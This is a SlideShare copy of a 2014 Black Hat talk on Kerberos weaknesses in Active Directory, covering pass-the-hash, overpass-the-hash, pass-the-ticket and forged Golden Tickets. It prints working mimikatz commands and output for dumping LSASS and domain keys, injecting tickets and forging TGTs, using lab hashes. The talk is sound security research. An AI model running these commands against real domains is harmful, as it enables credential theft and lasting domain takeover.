SlideShare a Scribd company logo

Abusing Microsoft Kerberos - Sorry you guys don't get it

Benjamin Delpy
Benjamin DelpyDirecteur de Projets Sécurité at Banque de France
by Alva `Skip` DUCKWALL
& Benjamin DELPY
Abusing Microsoft Kerberos
sorry you guys don’t get it
• Alva `Skip` DUCKWALL
@ passingthehash
http://passing-the-hash.blogspot.com
author of papers about Pass-the-hash & Kerberos
Dude in a basement somewhere
`whoami` - Skip
• Benjamin DELPY
@gentilkiwi
https://github.com/gentilkiwi
http://blog.gentilkiwi.com
author of mimikatz
is certainly admin of your domain
`whoami` - gentilkiwi
• We’ll speak about:
– Windows, Active Directory
– mimikatz
– NTLM Hash
– Kerberos
– Pass-the-hash/keys/ticket
– Golden Ticket
• We’ll try: 3 live demos.
– All of that also works from a non domain-joined computer.
Remember about Pass-The-Hash?
It still works…
despite what the Microsoft KB or Russinovich says
• Normal
• Pass-the-Hash
A little reminder
waza
1234/ NTLM (md4)
LM
cc36cf7a8514893e
fccd332446158b1a
d0e9aee149655a60
75e4540af1f22d3b
LSASS (msv1_0)
NTLM (md4)
LM
cc36cf7a8514893e
fccd332446158b1a
LSASS (msv1_0)
cc36cf7a8514893e
fccd332446158b1a
Cool isn’t it ? And it works like a charm
but with NTLM disabled or “Protected Users”?
*or maybe you only don’t want to leave
NTLM auth footprints in the Eventlog ;)
• It is all about keys and tickets
• For Example, let’s use Administrateur who wants to
access cifs on a win81 machine on chocolate.local
domain
• It needs 3 set of keys, all are in the Active Directory
– And by default, derived from password.
Kerberos
1. The KDC long-term secret key (domain key)
– Under the mysterious krbtgt account (rc4, aes128, aes256, des…)
– Needed to sign Microsoft specific data in “PAC”, encrypt TGT
2. The Client long-term secret key (derived from password)
– Under the user/computer/server account
– Needed to check AS-REQ, encrypt session key
3. The Target/Service long-term secret key (derived from password)
– Under the computer/server account
– Needed to countersign data in “PAC” of TGS, encrypt TGS
Kerberos :: keys
• Normal
Kerberos
waza
1234/
des_cbc_md5 f8fd987fa7153185
LSASS (kerberos)
for « chocolate.local » domain
rc4_hmac_nt
(NTLM/md4)
cc36cf7a8514893e
fccd332446158b1a
aes128_hmac
8451bb37aa6d7ce3
d2a5c2d24d317af3
aes256_hmac
b726836138609031
4acce8d9367e55f5
5865e7ef8e670fbe
4262d6c94098a9e9
KDC
KDC
TGT
TGS
③ TGS-REQ
④ TGS-REP
⑤ Usage
Administrateur
win81
• The KDC will validate the authentication if it can decrypt the timestamp with
the long-term user key (for RC4, the NTLM hash of the user password)
• It issues a TGT representing the user in the domain, for a specified period
Kerberos :: preauth
RID : 000001f4 (500)
User : Administrateur
* Primary
LM :
NTLM : cc36cf7a8514893efccd332446158b1a
* Kerberos-Newer-Keys
Default Salt : CHOCOLATE.LOCALAdministrateur
Default Iterations : 4096
Credentials
aes256_hmac (4096) : b7268361386090314acce8d9367e55f5
5865e7ef8e670fbe4262d6c94098a9e9
aes128_hmac (4096) : 8451bb37aa6d7ce3d2a5c2d24d317af3
des_cbc_md5 (4096) : f8fd987fa7153185
KDC
waza
1234/
rc4_hmac_nt
(NTLM/md4)
cc36cf7a8514893e
fccd332446158b1a
20140807054500Z
timestamp ① AS-REQ
② AS-REPTGT
• This TGT is encrypted with a key shared between all KDC
– The RC4 key for the krbtgt account : 310b643c5316c8c3c70a10cfb17e2e31
• The KDC adds a Microsoft specific PAC to a structure with user’s information
Kerberos :: TGT
RID : 000001f6 (502)
User : krbtgt
* Primary
LM :
NTLM : 310b643c5316c8c3c70a10cfb17e2e31
* Kerberos-Newer-Keys
Default Salt : CHOCOLATE.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd
5c827847ade468d6f6f739eb00c68e42
aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb
des_cbc_md5 (4096) : 620eb39e450e6776
KDC
TGT
Start/End/MaxRenew: 14/07/2014 00:46:09 ; 14/07/2014
10:46:09 ; 21/07/2014 00:46:09
Service Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @
CHOCOLATE.LOCAL
Target Name (02) : krbtgt ; CHOCOLATE ; @
CHOCOLATE.LOCAL
Client Name (01) : Administrateur ; @
CHOCOLATE.LOCAL ( CHOCOLATE )
Flags 40e10000 : name_canonicalize ; pre_authent ;
initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
f3bf2e0e26903703bec6259b400a586f403bbfe3771cb7972be3c
0868cb9cc69
RC4-HMAC – krbtgt
310b643c5316c8c3c70a10cfb17e2e31
Username : Administrateur
Domain SID
S-1-5-21-130452501-2365100805-3685010670
Authorization data Microsoft (PAC)
CHECKSUM_SRV – HMAC_MD5 - krbtgt
310b643c5316c8c3c70a10cfb17e2e3
CHECKSUM_KDC – HMAC_MD5 - krbtgt
310b643c5316c8c3c70a10cfb17e2e3
• The KDC will create a Microsoft specific structure (PAC) with user information
• This PAC is signed with the target key, and the KDC key
– for a TGT, the target is also the KDC, so it is the same key, 310b643c5316c8c3c70a10cfb17e2e31 for RC4
– KDC keys are in the krbtgt account
Kerberos :: TGT :: PAC
RID : 000001f6 (502)
User : krbtgt
* Primary
LM :
NTLM : 310b643c5316c8c3c70a10cfb17e2e31
* Kerberos-Newer-Keys
Default Salt : CHOCOLATE.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd
5c827847ade468d6f6f739eb00c68e42
aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb
des_cbc_md5 (4096) : 620eb39e450e6776
KDC
Username : Administrateur
Domain SID
S-1-5-21-130452501-2365100805-3685010670
User ID
500 Administrateur
Groups ID
512 Admins du domaine
519 Administrateurs de l’entreprise
518 Administrateurs du schéma
…
Authorization data Microsoft (PAC)
CHECKSUM_SRV – HMAC_MD5 - krbtgt
310b643c5316c8c3c70a10cfb17e2e3
CHECKSUM_KDC – HMAC_MD5 - krbtgt
310b643c5316c8c3c70a10cfb17e2e3
Kerberos :: KRBTGT
RID : 000001f6 (502)
User : krbtgt
* Primary
LM :
NTLM : 310b643c5316c8c3c70a10cfb17e2e31
* Kerberos-Newer-Keys
Default Salt : CHOCOLATE.LOCALkrbtgt
Default Iterations : 4096
Credenti
aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd
5c827847ade468d6f6f739eb00c68e42
aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb
des_cbc_md5 (4096) : 620eb39e450e6776
• KRBTGT account pwd / hash only changes:
– Upgrade of domain functional level (NT5->NT6)
– Bare metal recovery using restore media
– Manually changed (compromise recovery)
– In most enterprises this password hasn’t changed
in YEARS
• All of that is not secret !
– Tickets are ASN.1 encoded
• Use OpenSSL or your favorite tool
– Kerberos ticket (and KRB-CRED format)
• http://www.ietf.org/rfc/rfc4120.txt
– Microsoft Specific PAC
• http://msdn.microsoft.com/library/cc237917.aspx
Kerberos :: internal
Kerberos
Overpass-the-hash
• Overpass-the-Hash
or Pass-the-Key ;)
Kerberos
des_cbc_md5
LSASS (kerberos)
for « chocolate.local » domain
rc4_hmac_nt
(NTLM/md4)
cc36cf7a8514893e
fccd332446158b1a
aes128_hmac
aes256_hmac
KDC
KDC
TGT
TGS
③ TGS-REQ
④ TGS-REP
⑤ Usage
cc36cf7a8514893e
fccd332446158b1a
• Overpass-the-Hash
or Pass-the-Key ;)
not limited to RC4 !
Kerberos
des_cbc_md5
LSASS (kerberos)
for « chocolate.local » domain
rc4_hmac_nt
(NTLM/md4)
aes128_hmac
aes256_hmac
KDC
KDC
TGT
TGS
③ TGS-REQ
④ TGS-REP
⑤ Usage
b726836138609031
4acce8d9367e55f5
5865e7ef8e670fbe
4262d6c94098a9e9
b726836138609031
4acce8d9367e55f5
5865e7ef8e670fbe
4262d6c94098a9e9
“Ok, Skip, Kiwi, it’s cool…
but how can we find these keys?”
• Keys are both in Active Directory and client LSASS memory
• We can find:
– DES key
– RC4 key…. Yep, this is the NTLM hash of the password, no domain salt!
• Sorry Microsoft, we don’t get it, but your RFC yes ;) - http://www.ietf.org/rfc/rfc4757.txt
– AES128 & AES256 keys (with NT 6)
• New “protected users” group prevents Keys in client LSASS memory
– Of course not on the DC ;)
Kerberos :: Overpass-the-hash
• AES Keys use PBKDF2
– These hashes are salted
– 4096 iterations of the PBKDF2 algorithm
– Difficult to crack
• Of course these hashes are cached in memory on the client side and then
used as password equivalents, just like the NT hashes
• This is how you fail with strong cryptography
Kerberos :: AES Keys
• From Active Directory : Offline
– “just” need : ntds.dit & SYSTEM hive
– NTDSXtract : http://www.ntdsxtract.com
• python dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.7 ./work --name
Administrateur --syshive SYSTEM --supplcreds --passwordhashes --lmoutfile ./lm --ntoutfile
./nt --pwdformat john
Kerberos :: Overpass-the-hash
User name: Administrateur
[...]
Password hashes:
Administrateur:$NT$cc36cf7a8514893efccd332446158b1a:::
Supplemental credentials:
Kerberos newer keys
salt: CHOCOLATE.LOCALAdministrateur
Credentials
18 b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
17 8451bb37aa6d7ce3d2a5c2d24d317af3
3 f8fd987fa7153185
• From Active Directory : Online
Kerberos :: Overpass-the-hash
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # lsadump::lsa /inject /name:Administrateur
Domain : CHOCOLATE / S-1-5-21-130452501-2365100805-3685010670
RID : 000001f4 (500)
User : Administrateur
* Primary
LM :
NTLM : cc36cf7a8514893efccd332446158b1a
[...]
* Kerberos-Newer-Keys
Default Salt : CHOCOLATE.LOCALAdministrateur
Default Iterations : 4096
Credentials
aes256_hmac (4096) : b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
aes128_hmac (4096) : 8451bb37aa6d7ce3d2a5c2d24d317af3
des_cbc_md5 (4096) : f8fd987fa7153185
• From client LSASS memory
Kerberos :: Overpass-the-hash
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::ekeys
Authentication Id : 0 ; 1616704 (00000000:0018ab40)
Session : Interactive from 2
User Name : Administrateur
Domain : CHOCOLATE
SID : S-1-5-21-130452501-2365100805-3685010670-500
* Username : Administrateur
* Domain : CHOCOLATE.LOCAL
* Password : (null)
* Key List :
aes256_hmac b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
rc4_hmac_nt cc36cf7a8514893efccd332446158b1a
• Overpass-the-hash !
– mimikatz now supports pass-the-hash for both NTLM & Kerberos provider!
Kerberos :: Overpass-the-hash
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
user : Administrateur
domain : chocolate.local
program : cmd.exe
NTLM : cc36cf7a8514893efccd332446158b1a
| PID 2388
| TID 2392
| LUID 0 ; 264419 (00000000:000408e3)
_ msv1_0 - data copy @ 00000000003C7BC0 : OK !
_ kerberos - data copy @ 0000000000435988
_ aes256_hmac -> null
_ aes128_hmac -> null
_ rc4_hmac_nt OK
_ rc4_hmac_old OK
_ rc4_md4 OK
_ rc4_hmac_nt_exp OK
_ rc4_hmac_old_exp OK
_ *Password replace -> null
Old pass-the-hash for
NTLM protocol
New pass-the-hash
for Kerberos protocol
~ demo ! ~
• By the way, this is exactly how Aorato POC works
for changing password with just NTLM hash!
– They send a Kerberos request to the service :
kadmin/changepw
• http://www.aorato.com/blog/active-directory-vulnerability-
disclosure-weak-encryption-enables-attacker-change-victims-
password-without-logged/
Kerberos :: Overpass-the-hash
(more…)
Kerberos
Pass-the-ticket
• Pass-the-Ticket
Kerberos
des_cbc_md5
LSASS (kerberos)
for « chocolate.local » domain
rc4_hmac_nt
(NTLM/md4)
aes128_hmac
aes256_hmac
KDC
KDC
TGT
TGS
③ TGS-REQ
④ TGS-REP
⑤ Usage
TGT
• Pass-the-Ticket
also with TGS!
Kerberos
des_cbc_md5
LSASS (kerberos)
for « chocolate.local » domain
rc4_hmac_nt
(NTLM/md4)
aes128_hmac
aes256_hmac
KDC
KDC
TGS
③ TGS-REQ
④ TGS-REP
⑤ Usage
TGS
“Ok, Skip, Kiwi, it’s cool…
but how can we find these tickets?”
• TGT & TGS are in client LSASS memory
– The “normal” way: by API
• User can only export their ticket(s) (without privilege)
• For TGT: AllowTgtSessionKey registry key must be set for session key export…
– (mandatory to use the TGT)
• For TGS: no restriction at all!
– To get tickets : LsaCallAuthenticationPackage/KerbRetrieveEncodedTicketMessage
• In mimikatz: kerberos::list [/export]
– To pass-the-ticket : LsaCallAuthenticationPackage/KerbSubmitTicketMessage
• In mimikatz: kerberos::ptt ticket.kirbi
Not a hack : http://msdn.microsoft.com/library/windows/desktop/aa378099.aspx
Kerberos :: TGT & TGS
• Ok, but I want other people’s TGT & TGS !
Why do you want that? Are you a hacker?
– Raw memory reading (yep, even with minidump!)
– This time with all session keys
Kerberos :: TGT & TGS
• In mimikatz :
– privilege::debug
• (if not already SYSTEM)
– sekurlsa::tickets /export
• Make your choice !
• Then use it :
– kerberos::ptt ticket.kirbi
Kerberos :: TGT & TGS
~ demo ! ~
* No encryption check for THE domain administrator (id==500) !
No worry, this account is not sensitive ;)
** Not in memory when user in « Protected Users » group
Kerberos :: make your choice
Default
lifetime
Minimum
number of
KDC accesses
Multiple
targets
Available
with
Smartcard
Realtime check for
restrictions
(account disabled, logon
hours...)
Protected Users
Check for Encryption *
(RC4/AES)
Can be found in Is funky
Normal 42 days 2 Yes Yes Yes Yes n.a. No
Overpass-the-hash
(Pass-the-key)
42 days 2 Yes No Yes Yes
Active Directory
Client Memory **
No
(ok, a little;))
Pass-the-Ticket
(TGT)
10 hours 1 Yes Yes No (20mn after) No Client Memory Yes
Pass-the-Ticket
(TGS)
10 hours 0 No Yes No No Client Memory Yes
Golden Ticket 10 years 1 Yes Yes No (we can cheat) No n.a. Fuck, Yes!
Kerberos
Golden Ticket
• A “Golden Ticket”, is a homemade ticket
– It’s done with a lot of love
– … and a key
• It’s not made by the KDC, so :
– it’s not limited by GPO or others settings ;)
– you can push whatever you want inside!
– it’s smartcard independent (sorry CISO !)
Kerberos :: Golden Ticket
• …but a golden ticket is not only about lifetime modification (10 years is
hardcoded but can be modified)
• Interesting part is about to modify data into, like lifetime, but mainly the
Microsoft PAC :
– Groups (Domain/Enterprise Admins, by example ;)
– SID
– Username
Kerberos :: Golden Ticket
• Kerberos is STATELESS
– All account policy info is in the TGT
• Disabled / Expired / outside of logon hours
• Password expired
• Authentication silo membership
• “Protected Users” is just a group membership in the PAC
• Group Membership in the PAC
– This means that ALL account policy is Client Side Enforcement
Kerberos :: AD Account Policy
• Kerberos 5 has no method for the KDC/TGS (server) to validate
that an account is still valid when presented with a TGT
– Microsoft implemented a solution for this problem
– IF the TGT is older than 20 minutes, the KDC will validate the account
is still valid / enabled before issuing service tickets
• We will come back to this later 
Kerberos :: 20 Minute Rule
• Even if the technique remains the same, I’ve made the choice to
limit it to TGT (no TGS)
– Why ? Because TGT and TGS rely on different keys
– target key is renewed periodically, krbtgt… ~never 
– A single TGT can obtain many TGS
Kerberos :: Golden Ticket
Ticket
Encryption
PAC KDC
Signature
PAC Server
Signature
TGT krbtgt krbtgt krbtgt
TGS target krbtgt target
• All you need is :
– KDC Key (krbtgt), it can be RC4 (NTLM hash) or AES
– SID of the domain (whoami, psgetsid, etc.)
– Domain name
Kerberos :: Golden Ticket
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CHOCOLATE / S-1-5-21-130452501-2365100805-3685010670
* Primary
LM :
NTLM : 310b643c5316c8c3c70a10cfb17e2e31
* Kerberos-Newer-Keys
Default Salt : CHOCOLATE.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42
aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb
des_cbc_md5 (4096) : 620eb39e450e6776
• Create your own !
• kerberos::golden
/domain:chocolate.local <= domain name
/sid:S-1-5-21-130452501-2365100805-3685010670 <= domain SID
/rc4:310b643c5316c8c3c70a10cfb17e2e31 <= NTLM hash of krbtgt
/user:Administrateur <= username you wanna be
/id:500 <= RID of username (500 is THE domain admin)
/groups:513,512,520,518,519 <= Groups list of the user (be imaginative)
/ticket:Administrateur.kirbi <= the ticket filename
Kerberos :: Golden Ticket
• Client name : Administrateur
• Service name : krbtgt/chocolate.local
• Validity
– Start Time 07/08/2014 12:05:00
– End Time 07/08/2024 12:05:00
• …
• Authorization data Microsoft (PAC)
– Username : Administrateur
– Domain SID
• S-1-5-21-130452501-2365100805-3685010670
– User ID
• 500 Administrateur
– Groups ID
• 512 Admins du domaine
• 519 Administrateurs de l’entreprise
• 518 Administrateurs du schéma
• …
– …
Kerberos :: Golden Ticket
• Be crazy =)
– We want to have a long time access to a share limited to a user
“utilisateur”, disabled.
• kerberos::golden
/domain:chocolate.local
/sid:S-1-5-21-130452501-2365100805-3685010670
/aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42
/user:srvcharly$ <= real account always in good state
/id:1001 <= RID of the real account
/groups:513,1107 <= RID of “utilisateur” account, yep, in groups =)
/ticket:fake_utilisateur.kirbi
Kerberos :: Golden Ticket
• Be funky =)
• kerberos::golden
/domain:chocolate.local
/sid:S-1-5-21-130452501-2365100805-3685010670
/rc4:310b643c5316c8c3c70a10cfb17e2e31
/user:badguy
/id:0xffffffff
/groups:513,512,520,518,519
/ticket:badguy.kirbi
• Yep, both the USER and the ID don’t exist, so this TGT will only work for 20 mins (TGS
watchdog)
– It works if an ACL is defined with groups (this one spoofs a user in domain admins group; 512)
– …but all TGS obtained in this 20 mins will be valid 10h ;)
– …and you can make multiple TGT…
Kerberos :: Golden Ticket
~ demo ! ~
Sorry, it was the last demo ;)
~ Questions? ~
(if not enough time, come see us!)
• You! To come listen us!
– And trying to understand Benjamin ;)
– If you are shy : exorcyst{put here @}gmail.com & benjamin{put here @}gentilkiwi.com
• My co-speaker - he will recognize himself ;)
• Blackhat staff !
• Microsoft
– They give us a lot’s of subject for slides!
– For a few years, they have worked hard to enhance a lots of things in security (and it’s not easy to mix
security with retro compatibility)
• Security community (sorry, we have both a big list)
– Come see us for beer-time & stickers :P
Thank you all !
Abusing Microsoft Kerberos - Sorry you guys don't get it
1 of 53

Abusing Microsoft Kerberos - Sorry you guys don't get it

Download to read offline

Talk of Skip Duckwall and I at BlackHat 2014 USA / Defcon Wall of Sheep. Kerberos, and new pass-the-* feature, like overpass-the-hash and the Golden Ticket

Benjamin Delpy
Benjamin DelpyDirecteur de Projets Sécurité at Banque de France

Recommended

Red Team Methodology - A Naked Look by
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
14.7K views62 slides
DerbyCon 2019 - Kerberoasting Revisited by
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
10.4K views27 slides
I hunt sys admins 2.0 by
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0Will Schroeder
12.4K views51 slides
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz by
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNoSuchCon
1.3K views57 slides
Derbycon - The Unintended Risks of Trusting Active Directory by
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
35.9K views51 slides
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It by
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
45K views26 slides
(Ab)Using GPOs for Active Directory Pwnage by
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory PwnagePetros Koutroumpis
577 views53 slides
RACE - Minimal Rights and ACE for Active Directory Dominance by
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceNikhil Mittal
47.7K views52 slides

More Related Content

What's hot

Passwords#14 - mimikatz by
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatzBenjamin Delpy
10.4K views59 slides
ReCertifying Active Directory by
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active DirectoryWill Schroeder
1.8K views37 slides
PowerShell for Practical Purple Teaming by
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
5.3K views46 slides
Not a Security Boundary by
Not a Security BoundaryNot a Security Boundary
Not a Security BoundaryWill Schroeder
4K views48 slides
Evading Microsoft ATA for Active Directory Domination by
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationNikhil Mittal
35.4K views59 slides
Hunting Lateral Movement in Windows Infrastructure by
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
9.1K views52 slides
Petit potam slides-rtfm-ossir by
Petit potam slides-rtfm-ossirPetit potam slides-rtfm-ossir
Petit potam slides-rtfm-ossirLionelTopotam
2.4K views31 slides
Hunting malware with volatility v2.0 by
Hunting malware with volatility v2.0Hunting malware with volatility v2.0
Hunting malware with volatility v2.0Frank Boldewin
1.7K views40 slides
Red Team Revenge - Attacking Microsoft ATA by
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATANikhil Mittal
2.5K views41 slides
Ace Up the Sleeve by
Ace Up the SleeveAce Up the Sleeve
Ace Up the SleeveWill Schroeder
23.7K views60 slides
SIP Attack Handling (Kamailio World 2021) by
SIP Attack Handling (Kamailio World 2021)SIP Attack Handling (Kamailio World 2021)
SIP Attack Handling (Kamailio World 2021)Fred Posner
570 views33 slides
PowerShell for Cyber Warriors - Bsides Knoxville 2016 by
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016Russel Van Tuyl
3.9K views88 slides
Here Be Dragons: The Unexplored Land of Active Directory ACLs by
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
6.2K views47 slides
SSH by
SSHSSH
SSHZach Dennis
7.5K views100 slides
Intro to Pentesting Jenkins by
Intro to Pentesting JenkinsIntro to Pentesting Jenkins
Intro to Pentesting JenkinsBrian Hysell
707 views36 slides
PSConfEU - Offensive Active Directory (With PowerShell!) by
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
9K views16 slides
HashiCorp's Vault - The Examples by
HashiCorp's Vault - The ExamplesHashiCorp's Vault - The Examples
HashiCorp's Vault - The ExamplesMichał Czeraszkiewicz
3.2K views42 slides
Forging Trusts for Deception in Active Directory by
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryNikhil Mittal
56.9K views36 slides
Up is Down, Black is White: Using SCCM for Wrong and Right by
Up is Down, Black is White: Using SCCM for Wrong and RightUp is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and Rightenigma0x3
6.5K views52 slides
Adversary Emulation Workshop by
Adversary Emulation WorkshopAdversary Emulation Workshop
Adversary Emulation Workshopprithaaash
287 views121 slides

What's hot (20)

Passwords#14 - mimikatz by Benjamin Delpy
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatz
Benjamin Delpy10.4K views
ReCertifying Active Directory by Will Schroeder
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
Will Schroeder1.8K views
PowerShell for Practical Purple Teaming by Nikhil Mittal
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
Nikhil Mittal5.3K views
Evading Microsoft ATA for Active Directory Domination by Nikhil Mittal
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
Nikhil Mittal35.4K views
Hunting Lateral Movement in Windows Infrastructure by Sergey Soldatov
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov9.1K views
Petit potam slides-rtfm-ossir by LionelTopotam
Petit potam slides-rtfm-ossirPetit potam slides-rtfm-ossir
Petit potam slides-rtfm-ossir
LionelTopotam2.4K views
Hunting malware with volatility v2.0 by Frank Boldewin
Hunting malware with volatility v2.0Hunting malware with volatility v2.0
Hunting malware with volatility v2.0
Frank Boldewin1.7K views
Red Team Revenge - Attacking Microsoft ATA by Nikhil Mittal
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
Nikhil Mittal2.5K views
SIP Attack Handling (Kamailio World 2021) by Fred Posner
SIP Attack Handling (Kamailio World 2021)SIP Attack Handling (Kamailio World 2021)
SIP Attack Handling (Kamailio World 2021)
Fred Posner570 views
PowerShell for Cyber Warriors - Bsides Knoxville 2016 by Russel Van Tuyl
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
Russel Van Tuyl3.9K views
Here Be Dragons: The Unexplored Land of Active Directory ACLs by Andy Robbins
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Andy Robbins6.2K views
Intro to Pentesting Jenkins by Brian Hysell
Intro to Pentesting JenkinsIntro to Pentesting Jenkins
Intro to Pentesting Jenkins
Brian Hysell707 views
PSConfEU - Offensive Active Directory (With PowerShell!) by Will Schroeder
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder9K views
Forging Trusts for Deception in Active Directory by Nikhil Mittal
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active Directory
Nikhil Mittal56.9K views
Up is Down, Black is White: Using SCCM for Wrong and Right by enigma0x3
Up is Down, Black is White: Using SCCM for Wrong and RightUp is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and Right
enigma0x36.5K views
Adversary Emulation Workshop by prithaaash
Adversary Emulation WorkshopAdversary Emulation Workshop
Adversary Emulation Workshop
prithaaash287 views

Similar to Abusing Microsoft Kerberos - Sorry you guys don't get it

Ssh and sshfp dns records v04 by
Ssh and sshfp dns records v04Ssh and sshfp dns records v04
Ssh and sshfp dns records v04Bob Novas
640 views11 slides
Wce12 uba ampliasecurity_eng by
Wce12 uba ampliasecurity_engWce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_engfangjiafu
538 views56 slides
BalCCon2k18 - Towards the perfect cryptocurrency wallet by
BalCCon2k18 - Towards the perfect cryptocurrency walletBalCCon2k18 - Towards the perfect cryptocurrency wallet
BalCCon2k18 - Towards the perfect cryptocurrency walletNemanja Nikodijević
228 views20 slides
Docker and friends at Linux Days 2014 in Prague by
Docker and friends at Linux Days 2014 in PragueDocker and friends at Linux Days 2014 in Prague
Docker and friends at Linux Days 2014 in Praguetomasbart
2.8K views51 slides
Shutdown that bastion host! by
Shutdown that bastion host!Shutdown that bastion host!
Shutdown that bastion host!MichaelLudvig
31 views25 slides
In the Wake of Kerberoast by
In the Wake of KerberoastIn the Wake of Kerberoast
In the Wake of Kerberoastken_kitahara
834 views35 slides
Reverse engineering Swisscom's Centro Grande Modem by
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
780 views38 slides
Redis - for duplicate detection on real time stream by
Redis - for duplicate detection on real time streamRedis - for duplicate detection on real time stream
Redis - for duplicate detection on real time streamCodemotion
3.8K views38 slides
Redis for duplicate detection on real time stream by
Redis for duplicate detection on real time streamRedis for duplicate detection on real time stream
Redis for duplicate detection on real time streamRoberto Franchini
7.5K views38 slides
Velocity 2017 Performance analysis superpowers with Linux eBPF by
Velocity 2017 Performance analysis superpowers with Linux eBPFVelocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPFBrendan Gregg
737.1K views54 slides
Intel® RDT Hands-on Lab by
Intel® RDT Hands-on LabIntel® RDT Hands-on Lab
Intel® RDT Hands-on LabMichelle Holley
3.9K views32 slides
BPF: Tracing and more by
BPF: Tracing and moreBPF: Tracing and more
BPF: Tracing and moreBrendan Gregg
200.3K views72 slides
Clear cache memory by
Clear cache memoryClear cache memory
Clear cache memoryAbdullah Al Muzammi
928 views2 slides
Adventures in Underland: Is encryption solid as a rock or a handful of dust? by
Adventures in Underland: Is encryption solid as a rock or a handful of dust?Adventures in Underland: Is encryption solid as a rock or a handful of dust?
Adventures in Underland: Is encryption solid as a rock or a handful of dust?Paula Januszkiewicz
5.8K views42 slides
